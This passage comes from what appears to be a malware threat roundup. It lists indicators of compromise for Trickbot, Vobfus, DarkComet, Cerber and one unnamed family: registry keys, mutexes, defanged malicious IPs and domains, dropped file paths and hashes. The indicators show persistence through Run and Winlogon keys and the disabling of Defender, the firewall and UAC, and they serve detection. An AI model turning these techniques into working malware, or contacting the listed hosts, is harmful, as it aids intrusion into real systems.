`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST` | 26
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST` Value Name: `C:\Windows\system32\rundll32.exe` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` Value Name: `Impersonate` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` Value Name: `Asynchronous` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` Value Name: `MaxWait` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` Value Name: `DllName` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI` Value Name: `Startup` | 11
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `daoemni` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI` | 9
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI` Value Name: `Impersonate` | 9
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI` Value Name: `Asynchronous` | 9
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: MaxWait ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: DllName ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Startup ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: daomni ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Impersonate ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Asynchronous ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: MaxWait ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: DllName ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Startup ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: omnilg ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: syncfx ` | 1 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 26 \n`A9ZLO3DAFRVH1WAE` | 25 \n`I106865886KMTX` | 25 \n`IGBIASAARMOAIZ` | 25 \n`J8OSEXAZLIYSQ8J` | 25 \n`LXCV0IMGIXS0RTA1` | 25 \n`TXA19EQZP13A6JTR` | 25 \n`VSHBZL6SWAG0C` | 25 \n`A9MTX7ERFAMKLQ` | 25 \n`3G1S91V5ZA5fB56W` | 1 \n`8AZB70HDFK0WOZIZ` | 1 \n`NHO9AZB7HDK0WAZMM` | 1 \n`PJOQT7WD1SAOM` | 1 \n`PSHZ73VLLOAFB` | 1 \n`VHO9AZB7HDK0WAZMM` | 1 \n`VRK1AlIXBJDA5U3A` | 1 \n`<random, matching '[A-Z0-9]{14}'>` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`209[.]85[.]144[.]100` | 25 \n`172[.]217[.]7[.]206` | 21 \n`66[.]199[.]229[.]251` | 21 \n`62[.]75[.]222[.]235` | 21 \n`95[.]211[.]230[.]86` | 16 \n`5[.]104[.]230[.]200` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`w[.]topfealine[.]com` | 20 \n`l[.]topfealine[.]com` | 14 \n`w[.]netzsoflow[.]net` | 5 \n`n[.]netzsoflow[.]net` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 19 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 19 \n`%LOCALAPPDATA%\\daoemni.dll` | 11 \n`%LOCALAPPDATA%\\daomni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daoemni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daomni.dll` | 7 \n`%LOCALAPPDATA%\\omnilg.dll` | 5 \n`%HOMEPATH%\\Local Settings\\Application Data\\omnilg.dll` | 5 \n \n#### File Hashes\n\n` 05fc7a5cbd0145db5324d216eca44799f3089ce93b9020b1e79a8ffd074373e9 155931a83c112e3b9ec9e53170bc01f00f627149abb4df90506ff9746420ac33 1e781bec2e81a7ea35b3170ba13b8c383a5b34333bfdf5fb8c8fc2da89c79b47 21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7 22becfbe5b71e26f87a6f3525a75af422f9c6903873911290bc20f8869bd0b83 281c088b7ad0f9ed61fbdd599ffb2fdcd934a02ad66fe16b1f40c0e668d203fa 2f2e4c912ae939c550ab3d3d9723d562ceff5cd8f120570bf2ca75975d5dada1 32ea5866bda9068d8c0f10f3c50225823254194f89f841483e6dbad2e8227315 35c4024898d064cea42eebd3efe714e031aeb7a5cd685ff8fc55176762a6c5cc 371abc331dd0d9f9ae078efd7b88a60795e6707f1833f3b31675a7e80b96843f 392a1507494a62ddd1ad5f6659487254930dbba1dbcc98b3d0f34a1ab1852128 3e27faf67ebc38dc381617546201dafb570bcabc12d1d85e2088da56262d80e9 40d378b966cecafc1ba06ddfcbfb644fd408f83792e40109cd810914825d6b06 45f55ec75fdc96afb4133334435b00ea598206c9f00094a8ac42bbc37ff64310 50ab0d77e4368f929287ef0fe486712cc615f9a9c3d74f7767a257d2a677e1ae 551411d65a597560b93c303fc3fd0bde366f4fd767a940a127bc35c0e188255f 
56873d0e1082711b6e9f7c0dd230fd76963f5fe977002bba0fdd51d320d2480a 57260f19a6a615eba7325d454666b2a3cf05589e4ffd20eb34c67c4493b613d2 5b144acca2679ab8563e70e789ef0026b25dcc3e2f96e651a504ef35d7cfc1ae 6243725e2486608c0266f4b954487310e8b36f092e5172eacf967a37e12c49c1 6a836249f7f7cdaa5c796248b0684f0ca45bfa524148331b8de2e395d5b0b88a 8127c67786fa6bcf2ba3b891d1619f6b2589027d94d0f8b5f10a005a1dcc4df8 8b7e399b092922ae7972799f1d28d1f40bf2c463ec2ac90d332a816c1b307cbd 9b33901eb6a246891da01fba649a7ea058c10fc5865a6610b4627fa53d3c50cb 9db359f9c8d9e4960e5fb5475c4c873b386a522ef9340153966c841e594ea224 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MEH_qUEI3bc/XdgSxcGd8DI/AAAAAAAAC6g/beSkK_PU_8UaxAmaPrhSHSu31uZL9nlmACLcBGAsYHQ/s1600/21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7394707-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`117[.]196[.]233[.]100` | 10 \n`94[.]156[.]144[.]74` | 5 \n`78[.]24[.]219[.]9` | 5 \n`45[.]224[.]214[.]34` | 4 \n`103[.]219[.]213[.]102` | 3 \n`212[.]80[.]218[.]144` | 3 \n`216[.]239[.]32[.]21` | 2 \n`62[.]109[.]22[.]2` | 2 \n`107[.]173[.]240[.]221` | 2 \n`144[.]91[.]80[.]253` | 2 \n`51[.]89[.]115[.]110` | 2 \n`176[.]58[.]123[.]25` | 1 \n`116[.]203[.]16[.]95` | 1 \n`52[.]55[.]255[.]113` | 1 \n`69[.]195[.]159[.]158` | 1 \n`177[.]154[.]86[.]145` | 1 \n`66[.]85[.]173[.]57` | 1 \n`5[.]182[.]210[.]254` | 1 \n`117[.]255[.]221[.]135` | 1 \n`185[.]222[.]202[.]25` | 1 \n`195[.]123[.]220[.]155` | 1 \n`117[.]206[.]149[.]29` | 1 \n`170[.]84[.]78[.]224` | 1 \n`91[.]108[.]150[.]213` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ident[.]me` | 1 \n`myexternalip[.]com` | 1 \n`ip[.]anysrc[.]net` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\cmdcache` | 26 \n`%APPDATA%\\cmdcache\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%System32%\\Tasks\\Command cache application` | 26 \n`%ProgramData%\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%APPDATA%\\cmdcache\\data` | 26 \n`%APPDATA%\\cmdcache\\settings.ini` | 26 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 25 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 25 \n \n#### File Hashes\n\n` 031dba2decd40789db3851d1940275bab98d378ceb410eb661b463adf2410650 07553800c14fabbb3aca709a6d5d7af0b9936504fb3d1406825ba6034e22f97f 0d2da6104e039e429a4bb0f2a27744879a4551cbadb1e4a44de54343a6c0ac6c 218ba8f3d20fbab8eaa94aa7d3aa6ffe417d859bbf6bbd499c1e6211f0292a07 26616609c018bb2081c86a11b1567865a4ee63686eff17f4b7e88b6655ad93eb 2cd5c3baae45b92b8f39f808493a9805f94eed3847b94c853bfb160217225887 2da40b82795dff861dd4bf9025b4fd659e398d894df20ef399c1960fe92de323 
334aafa1b9ac0f0d94f690a25ad5841e732de6c0609704e838e8c8ad8986a207 339c9866157b0f51d0fe6c644cd8b485672fdbf16ad5244ceaa7b4eab9d0fd56 33da9747569d5cfa3e42d8a98b8cb941829905cac809428de49e9d011372b3be 3476f50e527ab1558f8a12b20a6d0394045c98b7b352f9703499c54ac13b526a 38548798cfcc55fc8200d3f3482d9eb7eafc14feda2b88b22d143c4fec75a175 3d9bb460763687a31c360beb958abae1a5e10add4fad3b0a9e3fb70aa3803241 3e1762697fe5f1996a8cd224a97bfd47fc2578ac1950d5e177cc17edc4fa9094 4766ae5c1ffdbf142e5c7df792654f591c1ef4df1e7775484d458c2b8237312a 4793182f8a55a7d2df459ea2ef2ed27835bfe43648d78bbe540ecfe9185f4380 48f273faec8a9236fadadcd0b88cc416eab9c4c40b064742213c1e5ed24cc105 4b3ff0afe6f834a9c05354fd2089662e670e9203b864969e0d67bb957af37c43 4cfabac70d45aa70f7e129fcf234ebf84e0edb950380bacf0008616d8059601b 53677c31b06dbf686f019dad8465876ae4e757adf186d02d60a5194106ee20da 5441d28936218f078a094e4b03a60db5f06a890f02ebbbabbf2e4345ef3ed05a 5641e7f156339b3c2d624972d9eea74910e39f0620aed2eadff1fa0635137541 58d92ae7cacfadf7ca36fbabebfa721299c4a828f81707290416639919f0fb20 5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211 5b80b61034467babade5a004fab79adb3d9f18416345c1cdbe6ca0776c9c9513 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1RgheslVqP4/XdgS-3RutLI/AAAAAAAAC6k/bSjKvt_b0_4eB2yJg4pr3I1sQKA35w7lwCLcBGAsYHQ/s1600/5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7395002-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU ` | 26 
\n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU \nValue Name: NoAutoUpdate ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ciiti ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: supej ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zauuca ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yxyom ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wznoid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qousu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jiigio ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bmjiif ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ryhiy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: caodaap ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: viean ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beoal ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fiiisep ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fuafoop ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juuso ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: peaceit ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mbnur ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zoelie ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: teuemar ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jomol ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue 
Name: yiozaot ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 26 \n`46[.]166[.]182[.]115` | 13 \n`37[.]48[.]65[.]148` | 11 \n`64[.]32[.]8[.]67` | 7 \n`207[.]244[.]67[.]214/31` | 4 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]anytime2[.]net` | 26 \n`ns1[.]anytime3[.]net` | 26 \n`ns1[.]anytime3[.]org` | 26 \n`ns1[.]anytime2[.]com` | 26 \n`ns1[.]anytime4[.]com` | 26 \n`ns1[.]anytime2[.]org` | 26 \n`ns1[.]anytime1[.]net` | 26 \n`ns1[.]anytime1[.]org` | 26 \n`ns1[.]anytime1[.]com` | 26 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 26 \n`\\System Volume Information.exe` | 26 \n`\\$RECYCLE.BIN.exe` | 26 \n`\\Secret.exe` | 26 \n`\\Passwords.exe` | 26 \n`\\Porn.exe` | 26 \n`\\Sexy.exe` | 26 \n`E:\\autorun.inf` | 26 \n`E:\\$RECYCLE.BIN.exe` | 26 \n`E:\\Passwords.exe` | 26 \n`E:\\Porn.exe` | 26 \n`E:\\Secret.exe` | 26 \n`E:\\Sexy.exe` | 26 \n`E:\\System Volume Information.exe` | 26 \n`E:\\x.mpeg` | 26 \n`%HOMEPATH%` | 26 \n`%HOMEPATH%\\Passwords.exe` | 26 \n`%HOMEPATH%\\Porn.exe` | 26 \n`%HOMEPATH%\\Secret.exe` | 26 \n`%HOMEPATH%\\Sexy.exe` | 26 \n`%HOMEPATH%\\c` | 26 \n`%HOMEPATH%\\c\\Passwords.exe` | 26 \n`%HOMEPATH%\\c\\Porn.exe` | 26 \n`%HOMEPATH%\\c\\Secret.exe` | 26 \n`%HOMEPATH%\\c\\Sexy.exe` | 26 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0114132de55fe3391d2ffe1eb2235af64538e704a5d39a7c12a5242b26feff60 024c44316844dd33ee87876a1acf6b823b30f97b8f9b2aa593289df21b0ec1d7 056bf3cca6f0cd4e41ad01e0eb4700bee0271c2bb3334642784920529e2554de 07ee7ffcf647257d1293ad9826c82fc09398f657092c25b21169f87fa5a7c9d4 08169078f447a9671714276fd75f906cd349fb720001a77d78bef56b9e35a233 081aabf461e76026a4b5ce622d7dea97bd5c69bd7f6291bc69325ee9e1b2478b 082ee719168ea7be341b1303d4e62fe30007af27470e269a63aa0b1098e7d488 084b2c416ebeb7c01a099604458bc0851f1e1e8b2f230522898cf4084c803f15 
0a1e200b0c26beab5775cfa61c2639ea27157e46781e70cbd78a4b19232b632b 0ad7fb766799dd2f438ba70821e2c7f6b2e08c524fd750b34a6209ab8ac3d480 0b11ae767b606de45c93913ce84153b226eae42d035871a9955f19c4cbb46c7a 0bf91f7b0d81a825f042006243db69eb23d52726c19b335ad42e188c53616d99 0c5f7e0d447a0f9445888ba803a9c6bb223bdee7d982be2f833d6184e754b7b0 0e323827671fd25c7f89c594618623916a4dc60221f405a3f2bf7df0275e4e0d 0eb69de315990b07cdc4e6472f7b1a178412d9730766fddb596bddf5b2576ed1 1396cae157a806641cb34122f34c22b4dc995028686f6a082725e4e335e60aed 13a7e9c873e5e108d28acca607b1689f391c1036db6d977f8602908046ca4739 148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5 156452ee7c520ac7ef66233c06b2d9bb8faa3c119e9ae697a53695a7f10c3fa3 15b5879a31b9e41872a13caefbff2bc7e4b672beb19a6fbc3c5b5a38774cc13d 16fa24d44c523e35c4c37fc149647d7e6c21d090a047127fc8d68fc6b9ad8a42 1713907f8ca3dc61f966a367d1d65a4dc13e525fc8ce091b2147d3665a3c0c23 193491d849129d8286edd480622bbe6da83f551d6cd8d3eb16c3cc38c21eeacb 1a59da8f0388e798d4ade89f7c880166b72ad576cc87a883568d614df2d0529d 1b1de63ef24f88d5350acd0909ed76b0ee71c7fa327a715bb1ae554feb33837b `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MtRhgx6TyoY/XdgTbaoPyeI/AAAAAAAAC60/qk40gWnPJ0Mpojdx8RMats0t2koWDMnJgCLcBGAsYHQ/s1600/148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7395004-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Driver ` | 7 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RealtekHD ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 2 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-RL28VNV` | 3 \n`DCMUTEX` | 1 \n`DC_MUTEX-JG8JLJL` | 1 \n`DC_MUTEX-M79BVMN` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`lolmands[.]chickenkiller[.]com` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\MSDCSC` | 7 \n`%APPDATA%\\MSDCSC\\driver` | 7 \n`%APPDATA%\\dclogs` | 4 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC` | 3 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`\\Documents and Settings\\All Users\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`%HOMEPATH%\\My Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%TEMP%\\RESIM 1.PNG` | 1 \n`%TEMP%\\~PI26.tmp` | 1 \n`%TEMP%\\~PI85.tmp` | 1 \n \n#### File Hashes\n\n` 0316a484966a555a7e369cf49423da28c7cba45bb38d031386ad1e98c7730ed0 30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619 3a44d9ae2b5508869df06bbf3dc0750f8e4cd8a7a827c95cd24f98966bbbfa38 48d15953b1c2f1e314a6ae3945ccbfd9b3e0fe2d40eea09c8d5f379b07f70866 5027bea06d7037f478ddcfd932cc82f682612e147f00d34d47cbf644453b74df 6289734ecf82dc9496402d9ceae7308819c4bbbb5d85642e8dc5108e8a08c32f 65e95281868c80b645d0276515b8b54fab52fe031a85b96c3e1d29148546bcb4 6c6483db05cbc3e863e3231405f66bc764930e5348800780d50bd1ccf1f869c4 74d2e08ab92859332efc3f97c0ef872979820527cc994c3d4160dd2da4add8e7 a44d66aebc02d8d612038c33bd397bf64097da98676b49315c74b79dd449b142 a7c7b756104d1a98a9daa80a7a591dab8cd210be1cf4a187363e42c23abc5856 be324c43b4b0a4f607e60db1926f4eca349fbb2fb6250da3337f7e94d1ea66c8 f43789df8769817412591e561390f06f9ae94b8047b0afd5b5c74170109729e8 f93f80520ccbba8fa35deb75f50ceba2f54b1ef52589b0c072248786bcef78b0 
fa45ff72c498d1af84a96317ecb71a96bd608799d529ae8334d83928dff7b970 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jBGicerbZyY/XdgT-NyQt3I/AAAAAAAAC68/yDQuF9Lf-UMvFXrQBLWVQWqQAxVoiwGWQCLcBGAsYHQ/s1600/30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7395321-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: api-PQEC ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 2 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UacDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 2 